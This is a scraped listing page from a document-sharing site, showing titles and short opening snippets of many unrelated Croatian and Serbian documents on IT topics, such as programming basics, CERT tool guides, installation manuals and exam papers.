OSNOVNI POJMOVI Naredba je uputa računalu za obavljanje određene radnje. Program je niz naredbi razumljivih računalu koje rješavaju neki problem. Pisanje programa zovemo programiranje. Programski jezik
ВишеRadionice, webinari i MOOC-ovi u sklopu projekta E-škole Radionica "E-učitelj suvremena nastava uz pomoć tehnologije" Trajanje: 5 sati Polaznici radio
Radionice, webinari i MOOC-ovi u sklopu projekta E-škole Radionica "E-učitelj suvremena nastava uz pomoć tehnologije" Polaznici radionice: Nastavnici predmeta matematika, fizika, biologija i kemija, stručni
Вишеeredar Sustav upravljanja prijavama odjelu komunalnog gospodarstva 1 UPUTE ZA KORIŠTENJE SUSTAVA 1. O eredar sustavu eredar je sustav upravljanja prij
eredar Sustav upravljanja prijavama odjelu komunalnog gospodarstva 1 UPUTE ZA KORIŠTENJE SUSTAVA 1. O eredar sustavu eredar je sustav upravljanja prijavama koje građani mogu slati Upravnom odjelu za komunalno
ВишеHxD CERT.hr-PUBDOC
HxD CERT.hr-PUBDOC-2019-3-376 Sadržaj 1 UVOD... 3 2 INSTALACIJA ALATA HXD... 4 3 KORIŠTENJE ALATA HXD... 9 3.1 SUČELJE HXD-A... 9 3.2 PREGLEDAVANJE DATOTEKA... 12 3.3 IZMJENA DATOTEKA... 13 3.4 SIGURNO
ВишеWeb programiranje i primjene - Osnovni pojmovi WEB tehnologije korišteni u kolegiju
Osnovni pojmovi WEB tehnologije korišteni u kolegiju Ivan Vazler Odjel za matematiku Sveučilište u Osijeku 16. listopada 2013. WWW - World Wide Web World Wide Web (WWW) svjetska mreža računala s izvorima
ВишеDržavno natjecanje / Osnove informatike Srednje škole Zadaci U sljedećim pitanjima na odgovore odgovaraš upisivanjem slova koji se nalazi ispred
Zadaci. 8. U sljedećim pitanjima na odgovore odgovaraš upisivanjem slova koji se nalazi ispred točnog odgovora, u za to predviđen prostor. Odgovor Ako želimo stvoriti i pohraniti sliku, ali tako da promjenom
ВишеSveučilište u Zagrebu Fakultet prometnih znanosti Zavod za inteligentne transportne sustave Katedra za primijenjeno računarstvo Vježba: #7 Kolegij: Ba
Sveučilište u Zagrebu Fakultet prometnih znanosti Zavod za inteligentne transportne sustave Katedra za primijenjeno računarstvo Vježba: #7 Kolegij: Baze podataka Tema: Osnovna SELECT naredba Vježbu pripremili:
ВишеAKD KID Middleware Upute za Macintosh instalaciju V1.0
AKD KID Middleware Upute za Macintosh instalaciju V1.0 Izdanje Datum Opis izmjene 1.0 06.04.2018. Inicijalna verzija dokumenta Sadržaj Instalacija... 2 Uklanjanje instalacije... 7 2.1 Uklanjanje instalacije
ВишеO Nanokinetik NeeS TOC Builder-u NeeS TOC Builder je aplikacija koja se koristi za kreiranje Tabele sadržaja (TOC) za elektronske podneske u NeeS form
O Nanokinetik NeeS TOC Builder-u NeeS TOC Builder je aplikacija koja se koristi za kreiranje Tabele sadržaja (TOC) za elektronske podneske u NeeS formatu. Ključne pojedinosti Nanokinetik NeeS TOC Builder-a:
ВишеUVJETI KORIŠTENJA INTERNETSKE STRANICE Korisnik posjetom web stranicama potvrđuje da je pročitao i da u cijelosti prihvaća o
UVJETI KORIŠTENJA INTERNETSKE STRANICE WWW.TELE2.HR Korisnik posjetom www.tele2.hr web stranicama potvrđuje da je pročitao i da u cijelosti prihvaća ove Uvjete korištenja web stranice www.tele2.hr (dalje
ВишеMicrosoft Office Sway
Microsoft Office Sway Нови алат за израду презентација Милан Зец Доситеј LANACO LANACO приручник MICROSOFT OFFICE SWAY НОВИ АЛАТ ЗА ИЗРАДУ ПРЕЗЕНТАЦИЈА Copyright 2016 Умножавање, репродукција или на други
ВишеSELECT statement basic form
NAZIV OBJEKTA ZNANJA Uvod u JQuery PROLOG Autor * Katarina Kaplarski Klasifikacija * Težina * Osnovni nivo Ključne reči * Ko sluša * Student OAS Trajanje * Komentari autora SADRŽAJ Apstrakt Cilj * Uvodne
ВишеELFI: UPUTSTVO ZA KORIŠTENJE
ELFI elearning sustav Uputstvo za instalaciju i korištenje Ivora škola informatike ELFI 2013 SADRŽAJ Sadržaj Poglavlje 1: Uvod... 2 1.1. ELFI... 2 1.2. Upute za instalaciju... 2 1.2.1. Sistemski zahtjevi
ВишеRAČUNALO
RAČUNALO HARDVER + SOFTVER RAČUNALO HARDVER strojna oprema računala tj. tvrdi, materijalni, opipljivi dijelovi računala kućište i sve komponente u njemu, vanjske jedinice SOFTVER neopipljivi dijelovi računala
ВишеMicrosoft Word - CCERT-PUBDOC doc
Analiza Look@LAN programskog paketa CCERT-PUBDOC-2007-09-204 Sigurnosni problemi u računalnim programima i operativnim sustavima područje je na kojem CARNet CERT kontinuirano radi. Rezultat toga rada ovaj
ВишеSlide 1
Kako jednostavnije preći na višu verziju Formsa Ivan Lovrić, Vedran Latin 14.10.2009. Sadržaj prezentacije Predmet migracije Razlozi za migraciju Infrastruktura potrebna za migraciju Pilot migracija Migracija
ВишеKAKO POHRANITI SVOJ RAD U REPOZITORIJ
KAKO POHRANITI SVOJ RAD U REPOZITORIJ? POHRANJIVANJE ZAVRŠNIH I DIPLOMSKIH RADOVA Upute za studente Ove su upute rezultat rada članova Radne skupine za edukaciju i podršku sustava Dabar u sastavu: Ivana
ВишеMultiBoot Korisnički priručnik
MultiBoot Korisnički priručnik Autorsko pravo 2006., 2007. Hewlett- Packard Development Company, L.P. Informacije sadržane u ovom dokumentu podložne su promjenama bez najave. Jedina jamstva za HP-ove proizvode
ВишеPoštovani,
Održavanje i korištenje informacijskih sustava Hrvatske vatrogasne zajednice Radni dokument Verzija 1.01 Lipanj 2019. Sadržaj 1. UVOD... 3 2. CILJ I SVRHA DOKUMENTA... 3 3. INFORMACIJSKI SUSTAVI I SPECIFIKACIJE
ВишеMicrosoft Word - CCERT-PUBDOC doc
Analiza Stumbler/55808 trojanskog konja CCERT-PUBDOC-2003-07-31 Sigurnosni problemi u računalnim programima i operativnim sustavima područje je na kojem CARNet CERT kontinuirano radi. Rezultat toga rada
ВишеMicrosoft Word - Uputstvo za koristenje aplikacije GIPKO
Aplikacija za elektronsko popunjavanje obrasca GIP-1022 i spašavanje podataka u datoteku u XML formatu GIPKO Verzija 1.2 Sadržaj Uvod... 3 Instalacija aplikacije... 4 Pokretanje aplikacije... 7 Meni aplikacije...
ВишеProgramiranje 2 popravni kolokvij, 15. lipnja Ime i prezime: JMBAG: Upute: Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i brisanj
Upute: Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i brisanje, te službeni šalabahter. Kalkulatori, mobiteli, razne neslužbene tablice, papiri i sl., nisu dozvoljeni! Sva rješenja napišite
ВишеMicrosoft PowerPoint - LB7-2_WCCF_2012.ppt
Praktikum automatizacije ak.g. 2011/2012 Laboratorijski blok 7 (Interaktivna vježba) LB7-2 Konfiguracija sučelja čovjek-stroj na operaterskom panelu unutar programskog paketa Step7 WinCC Flexible Četvrtak,
ВишеTest ispravio: (1) (2) Ukupan broj bodova: 21. veljače od 13:00 do 14:00 Županijsko natjecanje / Osnove informatike Osnovne škole Ime i prezime
Test ispravio: () () Ukupan broj bodova:. veljače 04. od 3:00 do 4:00 Ime i prezime Razred Škola Županija Mentor Sadržaj Upute za natjecatelje... Zadaci... Upute za natjecatelje Vrijeme pisanja: 60 minuta
ВишеPrikaz slike na monitoru i pisaču
CRT monitori s katodnom cijevi i LCD monitori na bazi tekućih kristala koji su gotovo istisnuli iz upotrebe prethodno navedene. LED monitori- Light Emitting Diode, zasniva se na elektrodama i diodama koje
ВишеeOI Middleware Upute za instalaciju
AKD eid Middleware Upute za Windows instalaciju V1.1 www.id.hr Izdanje Datum Opis izmjene 1.0 09.06.2017. Inicijalna verzija dokumenta. 1.1 30.08.2018. Izmjena vizualnog identiteta Sadržaj Instalacija...
ВишеMicrosoft PowerPoint - LB7-2_WCCF_2010.ppt
WinCC flexible alat za konfiguriranje HMI na operaterskom panelu Praktikum automatizacije LB7-2 Pregled predavanja WinCC flexible izgled, organizacija, princip rada Primjer Praktikum automatizacije --
ВишеPodružnica za građenje
Dodatak A OPIS USLUGA DODATAK A-1 PROJEKTNI ZADATAK Revizija scenarija i algoritama Regionalnih centara za nadzor i upravljanje prometom na autocestama Zagreb, srpanj 2019. 1. Uvod Sve veći porast prometa
ВишеVALIDNOST CERTIFIKATA ZA PRISTUP INTERNET APLIKACIJAMA POREZNE UPRAVE FEDERACIJE BOSNE I HERCEGOVINE (npis I ejs)
VALIDNOST CERTIFIKATA ZA PRISTUP INTERNET APLIKACIJAMA POREZNE UPRAVE FEDERACIJE BOSNE I HERCEGOVINE (NPIS I EJS) POREZNA UPRAVA FEDERACIJE BOSNE I HERCEGOVINE Sektor za informacione tehnologije Sarajevo,
ВишеSignal NCERT-PUBDOC
Signal NCERT-PUBDOC-2018-4-359 Sadržaj 1 UVOD... 3 2 INSTALACIJA APLIKACIJE SIGNAL... 4 3 KORIŠTENJE APLIKACIJE SIGNAL... 8 3.1 SLANJE PORUKA... 8 3.2 NESTAJUĆE PORUKE... 10 3.3 PROVJERA SIGURNOSNOG BROJA...
ВишеRačunarski softver Da bi računarski sistem mogao da radi, pored hardvera mora biti opremljen i odgovarajućim programima koji će njime upravljati.ova k
Računarski softver Da bi računarski sistem mogao da radi, pored hardvera mora biti opremljen i odgovarajućim programima koji će njime upravljati.ova komponenta računarskog sistema se zove SOFTVER(software
ВишеPrikaz znakova u računalu
PRIKAZ ZNAKOVA U RAČUNALU Načini kodiranja ASCII 1 znak 7 bitova Prošireni ASCII 1 znak 8 bitova (1B) UNICODE 1 znak 16 bitova (2B) ZADATCI S MATURE ljetni rok, 2014., zadatak 11 Koliko se različitih znakova
ВишеKriteriji ocjenjivanja 6razred
Kriteriji ocjenjivanja 6razred Nastavne cjeline: 1. Obrada teksta 2. Računalne mreže 3. Internet 4. Multimediji 5. Izrada prezentacija 12 Nastavna cjelina: OBRADA TEKSTA Dobar (3) Dovoljan (2). prepoznaje
ВишеRačunarski praktikum I - Vježbe 01 - Uvod
Prirodoslovno-matematički fakultet Matematički odsjek Sveučilište u Zagrebu RAČUNARSKI PRAKTIKUM I Vježbe 01 - Uvod v2018/2019. Sastavio: Zvonimir Bujanović Gradivo i način polaganja Gradivo: osnove jezika
ВишеMicrosoft Word - InveoP_01.docx
0 INVEO-P Inveo-P je jedinstveno rješenje na tržištu razvijeno upravo za paušalne obrte i jedino koje paušalnim obrtima omogućava potpuni pregled poslovanja. Razvijen je kao integrirano poslovno rješenje
ВишеWAMSTER Prezentacija
WAMSTER Mi smo Studio Elektronike Rijeka d.o.o. tvrtka za razvoj tehnoloških rješenja u automatici i elektronici tvrka osnovana 2006. na temelju komercijalizacije rezultata magistarskog rada locirani u
ВишеUpute - JOPPD kreiranje obrasca
Verzija uputa: 1.0 - JOPPD obrazac IPIS-PLAĆE, IPIS-UGOVORI O DJELU Ove upute će se još nadopunjavati, pa molim korisnike da redovito provjere da li imaju zadnje upute. Verzija uputa prikazana je na početku!
ВишеSlide 1
Roland Miklid Patrik Frankovid Zoran Frlan HEP d.d. Sektor za informatiku i telekomunikacije Sadržaj Uvod O projektu i njegovim fazama Oracle Forms & Reports Web servisi & B2B WebLogic BI Publisher Flex
ВишеPravilnik o načinu i uvjetima sprječavanja i suzbijanja zlouporaba i prijevara u pružanju usluga elektroničke pošte
HRVATSKA AGENCIJA ZA POŠTU I ELEKTRONIČKE KOMUNIKACIJE Temeljem članka 12. stavka 1. i članka 107. stavka 12. Zakona o elektroničkim komunikacijama (»Narodne novine«br. 73/08), Vijeće Hrvatske agencije
ВишеBiz web hosting
BIZ WEB HOSTING KORISNIČKO UPUTSTVO WWW.OBLACI.RS SADRŽAJ PRISTUP KORISNIČKOM PORTALU... 2 KUPOVINA BIZ WEB HOSTING SERVISA... 4 PRISTUP PLESK WEB KONTROLNOM PANELU... 14 PORTALI I DOMENI... 14 FAJL MENADŽER...
ВишеMicrosoft Word - IP_Tables_programski_alat.doc
1. IP Tables alat (pregled naredbi) 1.1. Osnovne IP Tables naredbe za filtriranje paketa U ovom poglavlju opisane su osnovne IP Tables naredbe korištene za filtriranje paketa. S programskim paketom IP
ВишеMicrosoft Word - Odluka o izmjeni dokumentacije o jednostavnoj nabavi.rtf
Na temelju Članka 200. stavak 6. Zakona o javnoj nabavi ( Narodne novine, br. 120/16) i Odluke o pravilima, uvjetima i postupcima nabave roba, usluga i radova u Energetskom institutu Hrvoje Požar: ODL-18-00393/1
ВишеDocument ID / Revision : 0419/1.1 ID Issuer Sustav (sustav izdavatelja identifikacijskih oznaka) Upute za registraciju gospodarskih subjekata
ID Issuer Sustav (sustav izdavatelja identifikacijskih oznaka) Upute za registraciju gospodarskih subjekata Gospodarski subjekti Definicija: U skladu s Direktivom 2014/40/EU gospodarski subjekt svaka
ВишеSveučilište u Zagrebu
SVEUČILIŠTE U ZAGREBU FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA RAČUNALNA FORENZIKA SEMINAR VoIP enkripcija Ivan Laznibat Zagreb, siječanj, 2017. Sadržaj 1. Uvod... 1 2. VoIP enkripcija... 3 2.1 PKI (eng.
ВишеMicrosoft PowerPoint - Rittal konfigurator 2019_prezentacija__HR
Rittal Configuration System Online konfigurator za Rittalove ormare PM-M N. Treml 19.07.2018 1 Jednostavnost konfiguracije Odaberite sustav Samostalni ormar, sustav ormara, različite dimenzije Konfigurirajte
ВишеWordPress & CSP Polisa Sigurnosti Sadržaja za WordPress Milan Petrović WordCamp Niš
WordPress & CSP Polisa Sigurnosti Sadržaja za WordPress Milan Petrović 18.5.2019. WordCamp Niš Predavanje, Google Docs: https://d4p.me/wordcampnis HTTP Zaglavlja Svaki HTTP odgovor počinje zaglavljima
ВишеLorem ipsum dolor sit amet lorem ipsum dolor
Početna prezentacija za korisnike Ključna aktivnost 1: Mobilnost u svrhu učenja: Razmjene mladih i Mobilnost osoba koje rade s mladima Završno izvješće Mobility tool Projektni ciklus Završno izvješće 1.
ВишеGenerated by Foxit PDF Creator Foxit Software For evaluation only. Operativni sistem U računarstvu, operativni sistem (OS
Operativni sistem U računarstvu, operativni sistem (OS) je kompleksan programski sistem koji kontroliše i upravlja uređajima i računarskim komponentama i obavljanje osnovne sistemske radnje. Operativni
ВишеCOMARC/A Format
COMARC/A 856 856 ELEKTRONSKA LOKACIJA I PRISTUP Polje možemo da koristimo u normativnim zapisima za obezbeđivanje dodatnih (elektronskih) informacija o entitetu za koji je zapis kreiran. Polje sadrži podatke
ВишеINTEGRIRANI KNJIŽNIČNI SUSTAV Sustav za podršku Upute za instalaciju: Aleph v22 ZAG
INTEGRIRANI KNJIŽNIČNI SUSTAV Sustav za podršku Upute za instalaciju: Aleph v22 ZAG INTEGIRANI KNJIŽNIČNI SUSTAV Upute za instalaciju: Aleph v22 ZAG Nacionalna i sveučilišna knjižnica u Zagrebu Ul. Hrvatske
ВишеUPUTA za uvođenje JOPPD - prva faza
UPUTA ZA UVOĐENJE OBRASCA JOPPD PRVA FAZA Prva faza uvođenja obrasca JOPPD uključuje slijedeće aktivnosti: 1. Instalacija nove verzije 2. Punjenje šifarnika potrebnih za JOPPD obrazac a. Oznake stjecatelja
ВишеKorisničke upute za podnošenje zahtjeva za rješavanje spora (žalbe)
Korisničke upute Verzija 2.0 HRVATSKA REGULATORNA AGENCIJA ZA MREŽNE DJELATNOSTI Roberta Frangeša Mihanovića 9, 10000 Zagreb / OIB: 87950783661 / Tel: (01) 7007 007, Fax: (01) 7007 070 / www.hakom.hr Sadržaj
ВишеINDIKATOR SVJETLA FUNKCIJE TIPKI 1. Prikazuje se temperatura i parametri upravljanja 2. Crveno svjetlo svijetli kad grijalica grije 3. Indikator zelen
INDIKATOR SVJETLA FUNKCIJE TIPKI 1. Prikazuje se temperatura i parametri upravljanja 2. Crveno svjetlo svijetli kad grijalica grije 3. Indikator zelenog svjetla koji prikazuje sniženu temperaturu. Uključuje
Вишеdon't be evil Dobrica Pavlinušić Kako u nestrukturiranom svijetu naći nestrukturirane informacije? Th
don't be evil Dobrica Pavlinušić dpavlin@rot13.org http://www.rot13.org/~dpavlin/ Kako u nestrukturiranom svijetu naći nestrukturirane informacije? This presentation is made without any affiliation with
ВишеУниверзитет у Београду Универзитетска библиотека Светозар Марковић Извори у отвореном приступу, е- књиге и цитатни менаџер Дејана Каваја Станишић kava
Универзитет у Београду Универзитетска библиотека Светозар Марковић Извори у отвореном приступу, е- књиге и цитатни менаџер Дејана Каваја Станишић kavaja@unilib.bg.ac.rs О чему ћемо говорити О електронским
ВишеSmjernice za korištenje HAVC portala Modul AV djela 1
Smjernice za korištenje HAVC portala Modul AV djela 1 Sadržaj Često postavljena pitanja (ČPP)... 3 1. Pregled i unos AV djela... 4 2. Pravila za unos AV djela... 6 Produkcijska kuća (Glavni producent)...
ВишеJMBAG Ime i Prezime Mreže računala Završni ispit 16. veljače Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i službeni šalabahter.
Mreže računala Završni ispit Na kolokviju je dozvoljeno koristiti samo pribor za pisanje i službeni šalabahter. Predajete samo papire koje ste dobili. Rezultati, uvid u ispit i upis ocjena:... Zadatak
ВишеE-RAČUN ZA POSLOVNE SUBJEKTE ZAPRIMANJE I SLANJE E-RAČUNA JE LAKO, PROVJERITE U FINI KAKO...
ZA POSLOVNE SUBJEKTE ZAPRIMANJE I SLANJE A JE LAKO, PROVJERITE U FINI KAKO... 2 ZA POSLOVNE SUBJEKTE Servis e-račun je internetski servis za elektroničku razmjenu računa između poslovnih subjekata (dobavljača
ВишеInženjering informacionih sistema
Fakultet tehničkih nauka, Novi Sad Inženjering informacionih sistema Dr Ivan Luković Dr Slavica Kordić Nikola Obrenović Milanka Bjelica Dr Jelena Borocki Dr Milan Delić UML UML (Unified Modeling Language)
ВишеCARNET Webmail Upute za korištenje
CARNET Webmail https://webmail.carnet.hr Upute za korištenje Sadržaj O Webmailu... 2 Prijava u sustav... 3 Korisničko sučelje... 5 Nova poruka... 5 Pregled poštanskog sandučića... 8 Pregled sadržaja poruke...
ВишеZAVOD ZA ELEKTRONIKU, MIKROELEKTRONIKU, RAČUNALNE I INTELIGENTNE SUSTAVE FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA SVEUČILIŠTE U ZAGREBU NAZIV SEMINARA au
ZAVOD ZA ELEKTRONIKU, MIKROELEKTRONIKU, RAČUNALNE I INTELIGENTNE SUSTAVE FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA SVEUČILIŠTE U ZAGREBU NAZIV SEMINARA autori seminara, imena i prezimena SEMINARSKI RAD IZ
ВишеKATALOG ZNANJA IZ INFORMATIKE
KATALOG ZNANJA IZ INFORMATIKE Nacionalni savjet za obrazovanje je na 27. sjednici održanoj 17. marta 2014. godine utvrdio izmjene predmetnoga programa INFORMATIKA za I razred gimnazije. Na zahtijev Pedagoško-psihološke
Више(Microsoft Word - S1-MTS-Primjena ra\350unala u poslovnoj praksi -Breslauer N)
1. OPĆE INFORMACIJE 1.1. Naziv kolegija Primjena računala u poslovnoj praksi 1.6. Semestar 1 1.. Nositelj kolegija Nenad Breslauer, v. pred. 1.7. Bodovna vrijednost (ECTS) 5 1.3. Suradnici 1.8. Način izvođenja
ВишеПрограмирај!
Листе Поред појединачних вредности исказаних бројем или ниском карактера, често је потребно забележити већи скуп вредности које су на неки начин повезане, као, на пример, имена у списку путника у неком
ВишеLISTOPAD DRUGO IZDANJE ZAŠTITITE PRIVATNOST NA FACEBOOKU Saznajte o opasnostima kojima se izlažete prilikom postavljanja osobnih podataka i sadr
LISTOPAD 2014. DRUGO IZDANJE ZAŠTITITE PRIVATNOST NA FACEBOOKU Saznajte o opasnostima kojima se izlažete prilikom postavljanja osobnih podataka i sadržaja na najpopularniju društvenu mrežu te kako podesiti
ВишеMicrosoft PowerPoint - Programski_Jezik_C_Organizacija_Izvornog_Programa_I_Greske [Compatibility Mode]
Programski jezik C organizacija izvornog programa Prevođenje Pisanje programa izvorni program Prevođenje programa izvršni program Izvršavanje programa rezultat Faze prevođenja Pretprocesiranje Kompilacija
ВишеVODIČ ZA MODERNIJE POSLOVANJE CLOUD STORAGE Privatna učilišta i škole stranih jezika prelaze u cloud
VODIČ ZA MODERNIJE POSLOVANJE CLOUD STORAGE Privatna učilišta i škole stranih jezika prelaze u cloud 01 Privatna učilišta i škole stranih jezika prelaze u cloud: polaznici imaju sve materijale za učenje
ВишеУПУТСТВО ЗА АУТОРЕ Радови се предају на начин и у формату који је доле прописан. Дужина текста је максимално до два ауторска табака (или до знак
УПУТСТВО ЗА АУТОРЕ Радови се предају на начин и у формату који је доле прописан. Дужина текста је максимално до два ауторска табака (или до 57600 знакова- Characters with spаces), укључујући наслове, апстракте,
ВишеPowerPointova prezentacija
ŽSV učitelja/nastavnika informatike Ličko-senjske županije Otočac, 19. studenog 2011. Ivanka Kranjčević-Orešković Sustav upravljanja kolegijima (Course Management System - CMS) otvorenoga koda (pod GNU
ВишеFra Serafina Schoena Rijeka MB: MBO: Žiro račun: kod RBA d.d. GSM:
EKLIPS MINI CMS upute za korištenje v1.0 1. Sadržaj isporuke i opće informacije EKLIPS MINI CMS sustav napravljen je pomoću sljedećih open source tehnologija Java JDK 1.5 - http://java.sun.com/javase/downloads/index_jdk5.jsp
ВишеPOSLOVNA INTELIGENCIJA I ANALITIKA ZA PRAVE POSLOVNE ODLUKE
POSLOVNA INTELIGENCIJA I ANALITIKA ZA PRAVE POSLOVNE ODLUKE Qlik Sense Family - najbolja platforma za poslovnu inteligenciju Kreiranje prilagodljivih i interaktivnih vizualizacija nikada nije bilo tako
ВишеСТАРТ - СТОП ПАРКИНГ СИСТЕМ КОРИСНИЧКО УПУТСТВО страна 1 од 12
СТАРТ - СТОП ПАРКИНГ СИСТЕМ КОРИСНИЧКО УПУТСТВО страна 1 од 12 РЕГИСТРАЦИЈА НА СТАРТ-СТОП ПАРКИНГ СИСТЕМ За коришћење СТАРТ-СТОП ПАРКИНГ система, корисник (физичко или правно лице) попуњава упитник у просторијама
ВишеIme i prezime učenika
UPUTE ZA KORIŠTENJE TABLETA GIMNAZIJA ŽUPANJA VELIKI KRAJ 42, ŽUPANJA Škola za život U sklopu eksperimentalnog programa Škola za život, čiji je nositelj Ministarstvo znanosti i obrazovanja, svaki učenik
ВишеRad u mrežnom okruženju Osnove informatike s primjenom računala
Rad u mrežnom okruženju DHCP 1/2 DHCP (Dynamic Host Configuration Protocol) je mrežni protokol koji omogućava automatiziranu dodjelu IP adresa računalu prema parametrima kao što su: mrežna maska koja će
Више** Osnovni meni
Instalacija serverske verzije Kataloga propisa Instalacija Kataloga propisa se vrši na sljedeći način: 1. Ubacite Instalacioni disk ili USB memoriju u računar. 2. Instalacioni program će se automatski
ВишеMicrosoft PowerPoint - PRI2014 KORIGOVANO [Compatibility Mode]
1. Broj bitova koji se jednovremeno prenosi i obrađuje unutar procesora naziva se: a) radni takt b) procesorski kod c) procesorska reč d) procesorski takt 1. Broj bitova koji se jednovremeno prenosi i
ВишеOtvoreni kôd u ucionicama
Otvoreni kôd u učionicama Ljiljana Despalatović 1 Borko Buković 1 Sveučilišni odjel za stručne studije, Sveučilište u Splitu, Hrvatska 19.studenog 2014. Slobodni softver Slobodni softver (engl. Free Software,
Више